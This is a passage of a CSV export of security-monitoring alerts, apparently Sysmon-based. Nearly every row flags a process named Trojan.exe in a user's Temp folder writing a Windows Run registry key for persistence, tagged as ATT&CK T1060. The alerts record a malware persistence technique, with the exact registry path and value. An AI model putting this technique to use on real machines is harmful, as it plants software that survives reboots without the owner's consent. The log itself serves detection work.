..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-24T16:27:23.185239000Z"",""eventRecordID"":""1991"",""processID"":""2176"",""threadID"":""3164"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-24 16:27:23.184\r\nProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00}\r\nProcessId: 6484\r\nImage: C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-24 16:27:23.184"",""processGuid"":""{df9fc3d3-9fd5-5eca-0000-00102b300b00}"",""processId"":""6484"",""image"":""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:27:26.125",10,"Multiple Windows error events","""Id = {00000000-0000-0000-0000-000000000000}; ClientMachine = DESKTOP-HUE026H; User = NT AUTHORITY\SYSTEM; ClientProcessId = 4400; Component = Unknown; Operation = Start IWbemServices::ExecQuery - root\Microsoft\Windows\DeviceGuard : SELECT AvailableSecurityProperties FROM Win32_DeviceGuard ; ResultCode = 0x80041032; PossibleCause = Unknown""",,,, +"May 24, 2020 @ 16:27:25.560",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-24 16:27:22.152 +ProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00} +ProcessId: 6484 +Image: C:\Users\John Williams\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-24T16:27:22.168829100Z"",""eventRecordID"":""1990"",""processID"":""2176"",""threadID"":""3164"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-24 16:27:22.152\r\nProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00}\r\nProcessId: 6484\r\nImage: C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-24 16:27:22.152"",""processGuid"":""{df9fc3d3-9fd5-5eca-0000-00102b300b00}"",""processId"":""6484"",""image"":""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:27:24.545",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-24 16:27:21.137 +ProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00} +ProcessId: 6484 +Image: C:\Users\John Williams\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-24T16:27:21.138338800Z"",""eventRecordID"":""1986"",""processID"":""2176"",""threadID"":""3164"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-24 16:27:21.137\r\nProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00}\r\nProcessId: 6484\r\nImage: C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-24 16:27:21.137"",""processGuid"":""{df9fc3d3-9fd5-5eca-0000-00102b300b00}"",""processId"":""6484"",""image"":""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:27:23.514",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-24 16:27:20.121 +ProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00} +ProcessId: 6484 +Image: C:\Users\John Williams\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-24T16:27:20.131555600Z"",""eventRecordID"":""1984"",""processID"":""2176"",""threadID"":""3164"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-24 16:27:20.121\r\nProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00}\r\nProcessId: 6484\r\nImage: C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-24 16:27:20.121"",""processGuid"":""{df9fc3d3-9fd5-5eca-0000-00102b300b00}"",""processId"":""6484"",""image"":""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:27:22.498",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-24 16:27:19.090 +ProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00} +ProcessId: 6484 +Image: C:\Users\John Williams\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-24T16:27:19.098827800Z"",""eventRecordID"":""1983"",""processID"":""2176"",""threadID"":""3164"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-24 16:27:19.090\r\nProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00}\r\nProcessId: 6484\r\nImage: C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-24 16:27:19.090"",""processGuid"":""{df9fc3d3-9fd5-5eca-0000-00102b300b00}"",""processId"":""6484"",""image"":""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:27:21.453",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-24 16:27:18.074 +ProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00} +ProcessId: 6484 +Image: C:\Users\John Williams\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-24T16:27:18.078667200Z"",""eventRecordID"":""1980"",""processID"":""2176"",""threadID"":""3164"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-24 16:27:18.074\r\nProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00}\r\nProcessId: 6484\r\nImage: C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-24 16:27:18.074"",""processGuid"":""{df9fc3d3-9fd5-5eca-0000-00102b300b00}"",""processId"":""6484"",""image"":""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:27:20.452",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-24 16:27:17.043 +ProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00} +ProcessId: 6484 +Image: C:\Users\John Williams\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-24T16:27:17.054226600Z"",""eventRecordID"":""1977"",""processID"":""2176"",""threadID"":""3164"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-24 16:27:17.043\r\nProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00}\r\nProcessId: 6484\r\nImage: C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-24 16:27:17.043"",""processGuid"":""{df9fc3d3-9fd5-5eca-0000-00102b300b00}"",""processId"":""6484"",""image"":""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:27:19.550",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-24 16:27:16.018 +ProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00} +ProcessId: 6484 +Image: C:\Users\John Williams\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-24T16:27:16.021275600Z"",""eventRecordID"":""1968"",""processID"":""2176"",""threadID"":""3164"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-24 16:27:16.018\r\nProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00}\r\nProcessId: 6484\r\nImage: C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-24 16:27:16.018"",""processGuid"":""{df9fc3d3-9fd5-5eca-0000-00102b300b00}"",""processId"":""6484"",""image"":""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:27:19.504",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-24 16:27:15.012 +ProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00} +ProcessId: 6484 +Image: C:\Users\John Williams\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-24T16:27:15.015789400Z"",""eventRecordID"":""1967"",""processID"":""2176"",""threadID"":""3164"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-24 16:27:15.012\r\nProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00}\r\nProcessId: 6484\r\nImage: C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-24 16:27:15.012"",""processGuid"":""{df9fc3d3-9fd5-5eca-0000-00102b300b00}"",""processId"":""6484"",""image"":""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:27:17.374",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-24 16:27:13.980 +ProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00} +ProcessId: 6484 +Image: C:\Users\John Williams\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-24T16:27:13.981765300Z"",""eventRecordID"":""1966"",""processID"":""2176"",""threadID"":""3164"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-24 16:27:13.980\r\nProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00}\r\nProcessId: 6484\r\nImage: C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-24 16:27:13.980"",""processGuid"":""{df9fc3d3-9fd5-5eca-0000-00102b300b00}"",""processId"":""6484"",""image"":""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:27:16.417",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-24 16:27:12.966 +ProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00} +ProcessId: 6484 +Image: C:\Users\John Williams\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-24T16:27:12.969299300Z"",""eventRecordID"":""1965"",""processID"":""2176"",""threadID"":""3164"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-24 16:27:12.966\r\nProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00}\r\nProcessId: 6484\r\nImage: C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-24 16:27:12.966"",""processGuid"":""{df9fc3d3-9fd5-5eca-0000-00102b300b00}"",""processId"":""6484"",""image"":""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:27:15.369",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-24 16:27:11.949 +ProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00} +ProcessId: 6484 +Image: C:\Users\John Williams\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" 